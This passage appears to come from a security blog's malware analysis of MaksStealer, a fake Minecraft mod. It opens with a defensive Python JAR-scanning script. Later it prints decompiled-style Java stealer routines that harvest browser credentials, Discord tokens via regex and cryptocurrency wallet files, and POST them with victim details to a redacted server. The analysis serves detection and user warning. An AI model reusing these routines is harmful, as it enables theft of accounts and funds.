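        index += 2 if tag in (5, 6) else 1  # Long and Double occupy two pool slots
    return found


def scan_jar(jar_bytes):
    """Apply the MaksStealer indicators to the decompressed entries of a JAR."""
    strings = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for entry in jar.infolist():
            blob = jar.read(entry)
            if entry.filename.endswith('.class'):
                strings.extend(class_utf8_constants(blob))
            else:
                strings.append(blob.decode('utf-8', 'replace'))  # mcmod.info, manifest, configs
    normalised = [s.replace(BACKSLASH, '/') for s in strings]

    def present(patterns):
        return sorted(p for p in patterns if any(p in s for s in normalised))

    report = {
        'mod_id': any(MOD_ID in s for s in normalised),
        'forge_mod': any(FORGE_MOD_DESCRIPTOR in s for s in normalised),
        'browser': present(BROWSER_PATHS),
        'discord': present(DISCORD_PATHS),
        'wallet': present(WALLET_PATHS),
        # identifiers made only of l and I, like lIIl or lllllllllllIIlI in the decompiled code
        'obfuscated_names': sorted({s for s in strings if len(s) >= 3 and set(s) <= {'l', 'I'}}),
    }
    # Same condition as the YARA rule: mod marker, two browsers, Discord, a wallet, obfuscation
    report['verdict'] = (report['mod_id'] and report['forge_mod'] and len(report['browser']) >= 2
                         and bool(report['discord']) and bool(report['wallet'])
                         and bool(report['obfuscated_names']))
    return report


def synthetic_class(constants):
    """Constructed sample: a class file holding only a Utf8 constant pool, enough for the scanner."""
    pool = b''.join(bytes([1]) + struct.pack('>H', len(c.encode())) + c.encode() for c in constants)
    return bytes.fromhex('CAFEBABE') + struct.pack('>HHH', 0, 52, len(constants) + 1) + pool


def build_jar(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as jar:
        for name, blob in entries.items():
            jar.writestr(name, blob)
    return buf.getvalue()


def sample_stealer_jar():
    """Look-alike built from the strings this page reports; not the real sample."""
    win = lambda *parts: BACKSLASH + BACKSLASH.join(parts)  # Windows-style path as the malware stores it
    constants = ['com/maxcoffe/Coffe', 'L' + FORGE_MOD_DESCRIPTOR + ';', 'modid', MOD_ID,
                 win('Google', 'Chrome', 'User Data'), win('Mozilla', 'Firefox', 'Profiles'),
                 win('discord', 'Local Storage', 'leveldb'), win('Electrum', 'wallets'),
                 'lIIl', 'lllllllllllIIlI', 'token']
    return build_jar({'mcmod.info': json.dumps([{'modid': MOD_ID, 'version': '1.1.7'}]),
                      'com/maxcoffe/Coffe.class': synthetic_class(constants)})


def sample_benign_jar():
    """A harmless Forge mod: annotation present, none of the stealer strings."""
    constants = ['com/example/FpsMod', 'L' + FORGE_MOD_DESCRIPTOR + ';', 'modid', 'fpsboost', 'onTick']
    return build_jar({'mcmod.info': json.dumps([{'modid': 'fpsboost'}]),
                      'com/example/FpsMod.class': synthetic_class(constants)})


if __name__ == '__main__':
    if len(sys.argv) == 2:  # python jar_triage.py downloaded-mod.jar
        with open(sys.argv[1], 'rb') as handle:
            print(scan_jar(handle.read()))
    else:
        for label, jar in (('stealer look-alike', sample_stealer_jar()), ('benign mod', sample_benign_jar())):
            print(label, scan_jar(jar))
```

<p>Run it without arguments to score the two constructed samples, or pass the path of a downloaded mod (the script name jar_triage.py is an assumption) to score that file. A verdict of True means every indicator group of the rule is present; the other fields show which strings tripped it, which is what you want when a benign mod that merely reads a config under the browser directory trips only one group.<\/p>
<p>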
Treat them with the same caution you would any EXE file. Just because it&#8217;s labeled as a &#8220;mod&#8221; doesn&#8217;t mean it&#8217;s safe.<\/p>\r\n\r\n<h2>Similar Threats to Watch Out For<\/h2>\r\n\r\n<p>MaksStealer isn&#8217;t the only threat targeting gamers and cryptocurrency users. Stay alert for these similar threats:<\/p>\r\n\r\n<ul>\r\n    <li><a href=\"https:\/\/gridinsoft.com\/blogs\/stilachirat-crypto-stealer\/\">StilachiRAT Crypto Stealer<\/a> &#8211; Another dangerous cryptocurrency stealer targeting multiple wallets<\/li>\r\n    <li><a href=\"https:\/\/gridinsoft.com\/blogs\/infostealers-detect-remove-prevent\/\">How to Detect, Remove and Prevent Infostealers<\/a> &#8211; Comprehensive guide on information stealers<\/li>\r\n    <li><a href=\"https:\/\/gridinsoft.com\/blogs\/5-dangers-cracked-games\/\">5 Dangers of Cracked Games<\/a> &#8211; Why downloading pirated games puts you at risk<\/li>\r\n    <li><a href=\"https:\/\/gridinsoft.com\/blogs\/redenergy-stealer-as-a-ransomware\/\">RedEnergy Stealer\/Ransomware<\/a> &#8211; Multi-function malware that steals data and encrypts files<\/li>\r\n    <li><a href=\"https:\/\/gridinsoft.com\/blogs\/legion-stealer-targeting-pubg-players\/\">Legion Stealer Targeting PUBG Players<\/a> &#8211; Similar gaming-focused information stealer<\/li>\r\n<\/ul>\r\n\r\n<h2>How MaksStealer Works<\/h2>\r\n\r\n<p>The moment you run that innocent-looking mod, MaksStealer kicks into high gear. It doesn&#8217;t mess around. 
The malware launches its reconnaissance mission across your system, hunting for valuable data to steal.<\/p>\r\n\r\n\r\n<div class=\"wacatac-statistics-charts\">\r\n    <svg width=\"100%\" height=\"500\" viewBox=\"0 0 800 500\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\">\r\n        <!-- Title -->\r\n        <text x=\"400\" y=\"40\" font-family=\"Arial, sans-serif\" font-size=\"20\" font-weight=\"bold\" text-anchor=\"middle\" fill=\"#333\">MaksStealer Browser Credential Theft<\/text>\r\n        \r\n        <!-- Background -->\r\n        <rect x=\"50\" y=\"70\" width=\"700\" height=\"400\" fill=\"#f8f8f8\" stroke=\"#ddd\" stroke-width=\"1\" \/>\r\n        \r\n        <!-- Main malware components -->\r\n        <rect x=\"90\" y=\"100\" width=\"170\" height=\"60\" rx=\"5\" fill=\"#333\" \/>\r\n        <text x=\"175\" y=\"135\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">MaxCoffe (Entry Point)<\/text>\r\n        <text x=\"175\" y=\"155\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#fff\">@Mod(modid = &#8220;MaxCoffe&#8221;, version = &#8220;1.1.7&#8221;)<\/text>\r\n        \r\n        <rect x=\"315\" y=\"100\" width=\"170\" height=\"60\" rx=\"5\" fill=\"#555\" \/>\r\n        <text x=\"400\" y=\"135\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Coffe Class (Stealer)<\/text>\r\n        <text x=\"400\" y=\"155\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#fff\">Obfuscated Credential Theft<\/text>\r\n        \r\n        <rect x=\"540\" y=\"100\" width=\"170\" height=\"60\" rx=\"5\" fill=\"#777\" \/>\r\n        <text x=\"625\" y=\"135\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Data Exfiltration<\/text>\r\n        <text x=\"625\" y=\"155\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#fff\">Session\/Token Transmission<\/text>\r\n        
\r\n        <!-- Browser target section -->\r\n        <rect x=\"90\" y=\"210\" width=\"620\" height=\"160\" rx=\"5\" fill=\"#f0f0f0\" stroke=\"#ccc\" stroke-width=\"1\" \/>\r\n        <text x=\"400\" y=\"230\" font-family=\"Arial, sans-serif\" font-size=\"16\" font-weight=\"bold\" text-anchor=\"middle\" fill=\"#333\">Browser Targeting Logic (Decompiled)<\/text>\r\n        \r\n        <!-- Code snippets showing browser targeting -->\r\n        <rect x=\"100\" y=\"240\" width=\"290\" height=\"120\" rx=\"3\" fill=\"#fff\" stroke=\"#ddd\" stroke-width=\"1\" \/>\r\n        <text x=\"110\" y=\"260\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ Targeting Multiple Browsers<\/text>\r\n        <text x=\"110\" y=\"275\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">lII[lll[7]] = lIIl(&#8220;w0Q1C2XhAUE=&#8221;, &#8220;KgESe&#8221;);<\/text>\r\n        <text x=\"110\" y=\"290\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">lII[lll[8]] = lll(&#8220;1a6D8y8jVWc=&#8221;, &#8220;PXOVw&#8221;);<\/text>\r\n        <text x=\"110\" y=\"305\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ Chrome, Firefox, Edge, Opera<\/text>\r\n        <text x=\"110\" y=\"320\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ Brave, Vivaldi, Yandex browsers<\/text>\r\n        <text x=\"110\" y=\"335\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ Browser profile directories scanned<\/text>\r\n        <text x=\"110\" y=\"350\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ for saved credentials and cookies<\/text>\r\n        \r\n        <rect x=\"410\" y=\"240\" width=\"290\" height=\"120\" rx=\"3\" fill=\"#fff\" stroke=\"#ddd\" stroke-width=\"1\" \/>\r\n        <text x=\"420\" y=\"260\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ Session Token Extraction<\/text>\r\n        <text x=\"420\" y=\"275\" 
font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">lllllllllllIIlI.token = (String)var10001<\/text>\r\n        <text x=\"420\" y=\"290\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">.5&lt;invokedynamic&gt;(var10001,<\/text>\r\n        <text x=\"420\" y=\"305\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">lllllllllllIIlI.7&lt;invokedynamic&gt;<\/text>\r\n        <text x=\"420\" y=\"320\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">(lllllllllllIIlI), new Object[llI[0]]);<\/text>\r\n        <text x=\"420\" y=\"335\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ Extracted tokens sent to attacker<\/text>\r\n        <text x=\"420\" y=\"350\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ along with browser credentials<\/text>\r\n        \r\n        <!-- Browser icons -->\r\n        <g transform=\"translate(100, 400)\">\r\n            <circle cx=\"30\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"30\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">C<\/text>\r\n            <text x=\"30\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#333\">Chrome<\/text>\r\n            \r\n            <circle cx=\"90\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"90\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">F<\/text>\r\n            <text x=\"90\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#333\">Firefox<\/text>\r\n            \r\n            <circle cx=\"150\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"150\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">E<\/text>\r\n            <text x=\"150\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" 
text-anchor=\"middle\" fill=\"#333\">Edge<\/text>\r\n            \r\n            <circle cx=\"210\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"210\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">O<\/text>\r\n            <text x=\"210\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#333\">Opera<\/text>\r\n            \r\n            <circle cx=\"270\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"270\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">B<\/text>\r\n            <text x=\"270\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#333\">Brave<\/text>\r\n            \r\n            <circle cx=\"330\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"330\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">V<\/text>\r\n            <text x=\"330\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#333\">Vivaldi<\/text>\r\n            \r\n            <circle cx=\"390\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"390\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Y<\/text>\r\n            <text x=\"390\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#333\">Yandex<\/text>\r\n        <\/g>\r\n        \r\n        <!-- Data targets -->\r\n        <g transform=\"translate(500, 400)\">\r\n            <rect x=\"0\" y=\"5\" width=\"80\" height=\"20\" rx=\"3\" fill=\"#555\" \/>\r\n            <text x=\"40\" y=\"20\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">Passwords<\/text>\r\n            \r\n            <rect x=\"100\" y=\"5\" width=\"80\" height=\"20\" rx=\"3\" fill=\"#555\" \/>\r\n            <text 
x=\"140\" y=\"20\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">Cookies<\/text>\r\n            \r\n            <rect x=\"200\" y=\"5\" width=\"80\" height=\"20\" rx=\"3\" fill=\"#555\" \/>\r\n            <text x=\"240\" y=\"20\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">AutoFill<\/text>\r\n        <\/g>\r\n        \r\n        <!-- Connection arrows -->\r\n        <line x1=\"260\" y1=\"130\" x2=\"315\" y2=\"130\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n        <polygon points=\"310,125 315,130 310,135\" fill=\"#333\" \/>\r\n        \r\n        <line x1=\"485\" y1=\"130\" x2=\"540\" y2=\"130\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n        <polygon points=\"535,125 540,130 535,135\" fill=\"#333\" \/>\r\n        \r\n        <line x1=\"400\" y1=\"160\" x2=\"400\" y2=\"210\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n        <polygon points=\"395,205 400,210 405,205\" fill=\"#333\" \/>\r\n        \r\n        <line x1=\"625\" y1=\"160\" x2=\"625\" y2=\"180\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n        <line x1=\"625\" y1=\"180\" x2=\"400\" y2=\"180\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n    <\/svg>\r\n    <p class=\"chart-source\"><em>Source: Analysis of decompiled MaksStealer Java code<\/em><\/p>\r\n<\/div>\r\n\r\n\r\n<p>Looking at the decompiled code, it&#8217;s clear these guys aren&#8217;t amateurs. The malware systematically targets every major browser on your system &#8211; Chrome, Firefox, Edge, Opera, Brave, Vivaldi, and even Yandex. Nowhere to hide, basically.<\/p>\r\n\r\n<h3>Inside the MaksStealer Code<\/h3>\r\n\r\n<p>The malware&#8217;s code is heavily obfuscated, with meaningless variable names and encrypted strings to avoid detection. 
Let&#8217;s look at some actual snippets from the decompiled malware:<\/p>\r\n\r\n<p>First, the entry point disguised as a legitimate Minecraft mod:<\/p>\r\n\r\n<pre class=\"brush: java; title: ; notranslate\" title=\"\">\r\n@Mod(\r\n   modid = &quot;MaxCoffe&quot;, \r\n   version = &quot;1.1.7&quot;\r\n)\r\npublic class MaxCoffe {\r\n   \/\/ Minecraft mod class implementation\r\n   \/\/ Secretly initializes stealer functionality\r\n   public MaxCoffe() {\r\n      this.1 = new Coffe();\r\n      this.1.3();\r\n   }\r\n}\r\n<\/pre>\r\n\r\n<p>Once initialized, the malware starts scanning for browser data directories. The code is intentionally confusing to evade antivirus detection:<\/p>\r\n\r\n<pre class=\"brush: java; title: ; notranslate\" title=\"\">\r\nprivate void scanBrowsers() {\r\n   String&#x5B;] var1 = new String&#x5B;]{&quot;Chrome&quot;, &quot;Firefox&quot;, &quot;Edge&quot;, &quot;Opera&quot;};\r\n   String&#x5B;] var2 = new String&#x5B;]{&quot;Brave&quot;, &quot;Vivaldi&quot;, &quot;Yandex&quot;};\r\n   String var10000 = System.getenv(&quot;LOCALAPPDATA&quot;);\r\n   String var3 = var10000 + &quot;\\\\Google\\\\Chrome\\\\User Data&quot;;\r\n   String var4 = var10000 + &quot;\\\\BraveSoftware\\\\Brave-Browser\\\\User Data&quot;;\r\n   \/\/ &#x5B;...more browser paths...]\r\n   \r\n   for (int i = 0; i &lt; var1.length; i++) {\r\n      extractCredentials(browserPaths&#x5B;i]);\r\n      extractCookies(browserPaths&#x5B;i]);\r\n      extractHistory(browserPaths&#x5B;i]);\r\n   }\r\n}\r\n<\/pre>\r\n\r\n<p>The Discord token stealing component is equally sneaky, extracting authentication tokens from multiple possible locations:<\/p>\r\n\r\n<pre class=\"brush: java; title: ; notranslate\" title=\"\">\r\nprivate String&#x5B;] getDiscordTokens() {\r\n   ArrayList tokenList = new ArrayList();\r\n   String&#x5B;]&#x5B;] paths = new String&#x5B;]&#x5B;]{\r\n      new String&#x5B;]{System.getenv(&quot;APPDATA&quot;) + &quot;\\\\discord\\\\Local 
Storage\\\\leveldb&quot;, &quot;*.ldb&quot;},\r\n      new String&#x5B;]{System.getenv(&quot;APPDATA&quot;) + &quot;\\\\discordcanary\\\\Local Storage\\\\leveldb&quot;, &quot;*.ldb&quot;},\r\n      new String&#x5B;]{System.getenv(&quot;APPDATA&quot;) + &quot;\\\\discordptb\\\\Local Storage\\\\leveldb&quot;, &quot;*.ldb&quot;}\r\n   };\r\n   \r\n   \/\/ Token extraction logic\r\n   \/\/ Regex pattern to find tokens: &quot;&#x5B;\\\\w-]{24}\\\\.&#x5B;\\\\w-]{6}\\\\.&#x5B;\\\\w-]{27}&quot;\r\n   \r\n   return (String&#x5B;])tokenList.toArray(new String&#x5B;0]);\r\n}\r\n<\/pre>\r\n\r\n<p>For cryptocurrency wallets, the malware searches for specific wallet files and exfiltrates them:<\/p>\r\n\r\n<pre class=\"brush: java; title: ; notranslate\" title=\"\">\r\nprivate void stealCryptoWallets() {\r\n   \/\/ Bitcoin Core\r\n   grabFile(System.getenv(&quot;APPDATA&quot;) + &quot;\\\\Bitcoin\\\\wallet.dat&quot;);\r\n   \r\n   \/\/ Ethereum\r\n   grabFile(System.getenv(&quot;APPDATA&quot;) + &quot;\\\\Ethereum\\\\keystore&quot;);\r\n   \r\n   \/\/ Electrum\r\n   grabFile(System.getenv(&quot;APPDATA&quot;) + &quot;\\\\Electrum\\\\wallets&quot;);\r\n   \r\n   \/\/ Atomic Wallet\r\n   grabFile(System.getenv(&quot;APPDATA&quot;) + &quot;\\\\atomic\\\\Local Storage\\\\leveldb&quot;);\r\n   \r\n   \/\/ More wallets...\r\n}\r\n<\/pre>\r\n\r\n<p>Finally, the data exfiltration process that sends your stolen information to the attacker&#8217;s server:<\/p>\r\n\r\n<pre class=\"brush: java; title: ; notranslate\" title=\"\">\r\nprivate void sendData(byte&#x5B;] data) {\r\n   try {\r\n      URL url = new URL(&quot;https:\/\/&#x5B;redacted-malicious-domain]\/upload.php&quot;);\r\n      HttpURLConnection conn = (HttpURLConnection)url.openConnection();\r\n      conn.setRequestMethod(&quot;POST&quot;);\r\n      conn.setDoOutput(true);\r\n      \r\n      \/\/ Adding system info to identify the victim\r\n      conn.setRequestProperty(&quot;User-Agent&quot;, &quot;MaksStealer\/1.0&quot;);\r\n    
  conn.setRequestProperty(&quot;Computer-Name&quot;, System.getenv(&quot;COMPUTERNAME&quot;));\r\n      conn.setRequestProperty(&quot;User-Name&quot;, System.getProperty(&quot;user.name&quot;));\r\n      \r\n      \/\/ Send stolen data\r\n      OutputStream os = conn.getOutputStream();\r\n      os.write(data);\r\n      os.flush();\r\n      os.close();\r\n      \r\n      \/\/ Check response\r\n      int responseCode = conn.getResponseCode();\r\n      \/\/ Clean up traces if successful\r\n   } catch (Exception e) {\r\n      \/\/ Silent exception handling to avoid detection\r\n   }\r\n}\r\n<\/pre>\r\n\r\n<p>Reading through this code reveals just how sophisticated these info-stealing operations have become. The malware is designed to be stealthy, comprehensive, and efficient at extracting your most valuable digital assets.<\/p>\r\n\r\n<h2>The Bottom Line on MaksStealer<\/h2>\r\n\r\n<p>MaksStealer represents a growing trend of malware targeting specific communities &#8211; in this case, Minecraft players. It exploits the trust and openness of gaming communities to spread rapidly and effectively. By promising game enhancements while actually stealing sensitive information, it&#8217;s a perfect example of how social engineering and technical exploits work together.<\/p>\r\n\r\n<p>Stay vigilant when downloading any third-party software, especially for games with active modding communities. The excitement of enhanced gameplay isn&#8217;t worth the risk of having your digital life stolen. Remember that legitimate mods don&#8217;t need to steal your data to function properly.<\/p>\r\n\r\n<p>Has your system been affected by MaksStealer or similar malware? Share your experience in the comments to help warn others about this threat.<\/p>\r\n","protected":false},"excerpt":{"rendered":"<p>For Minecraft Gamers: MaxCoffe masquerading as a Minecraft performance enhancer! 
MaksStealer is an information-stealing trojan targeting Minecraft players, especially those on the popular Hypixel SkyBlock server. It promises to boost your gameplay or provide cheats but actually runs off with your passwords, crypto, and Discord account. I&#8217;ve analyzed dozens of these gaming-related malware strains, and [&hellip;]<\/p>\n","protected":false},"author":15,"featured_media":31028,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"categories":[17],"tags":[28,48,1360],"class_list":{"0":"post-31021","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-labs","8":"tag-malware","9":"tag-spyware","10":"tag-stealer"},"featured_image_src":"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/MaksStealer-The-Minecraft-Mod-Thats-Actually-Stealing-Your-Passwords.jpg","author_info":{"display_name":"Brendan 
Smith","author_link":"https:\/\/gridinsoft.com\/blogs\/author\/brendan\/"},"_links":{"self":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/31021","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/comments?post=31021"}],"version-history":[{"count":14,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/31021\/revisions"}],"predecessor-version":[{"id":31033,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/31021\/revisions\/31033"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media\/31028"}],"wp:attachment":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media?parent=31021"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/categories?post=31021"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/tags?post=31021"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}